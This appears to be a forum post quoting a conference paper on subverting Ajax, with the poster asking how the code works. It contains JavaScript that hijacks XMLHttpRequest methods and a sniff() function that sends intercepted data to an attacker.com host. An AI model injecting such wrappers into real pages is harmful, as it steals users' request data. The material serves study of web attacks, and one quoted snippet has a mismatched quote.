http://events.ccc.de/congress/2006/F...rting_Ajax.pdf
The most important concept could be explained by
looking at the following code:
var xmlreqc=XMLHttpRequest;
XMLHttpRequest = function() {
this.xml = new xmlreqc();
return this;
}
In this example, the reference to XMLHttpRequest
native object is saved in a new variable and
XMLHttpRequest is readdressed to a new object by
using one of the many ways of creating a
constructor. Inside the constructor, a new attribute is
instantiated as the previously saved real
XMLHttpRequest. From now on, every cloned object

will be a wrapper clone and not a clone of the
original one.
What follows is the implementation of wrapper
methods for some of XMLHttpRequest native
objects, in order to create a Man in the middle
attack (ref. Figure 2).
Before we go into deep of hijacking, let's suppose
there is a 'sniff()' function using the techniques
described by Rager[13] and Grossman[6]:
function sniff(){
var data='';
for(var i=0; i<arguments.length; i++)
data+=arguments[i];
if(image==null)
image = document.createElement('img');
if(data.length> 1024)
data= data.substring(0, 1024) ;
image.src=
'http://www.attacker.com/hijacked.html?data='+data;
}
Let's now show some examples that wrap native
methods and intercept them.
XMLHttpRequest.prototype.send = function (pay){
// Hijacked .send
sniff("Hijacked: "+" "+pay);
pay=HijackRequest(pay);
return this.xml.send(pay);
}


Next code example could allow an attacker to modify
any native attribute values or application behaviour,
by using defineSetter and defineGetter methods[14]:
XMLHttpRequest.prototype.__defineSetter__(
"multipart",function (h){ // Hijacked multipart
this.xml.multipart=h
sniff("multipart: "+" "+h);
return h;
});
XMLHttpRequest.prototype.__defineGetter__(
'status",function (){ // Hijacked status
h=this.xml.status ;
sniff("status: "+" "+h);
return h;
});
I can't understand how the blod codes can be used for attack . especially first bold

Please guide thanks in advance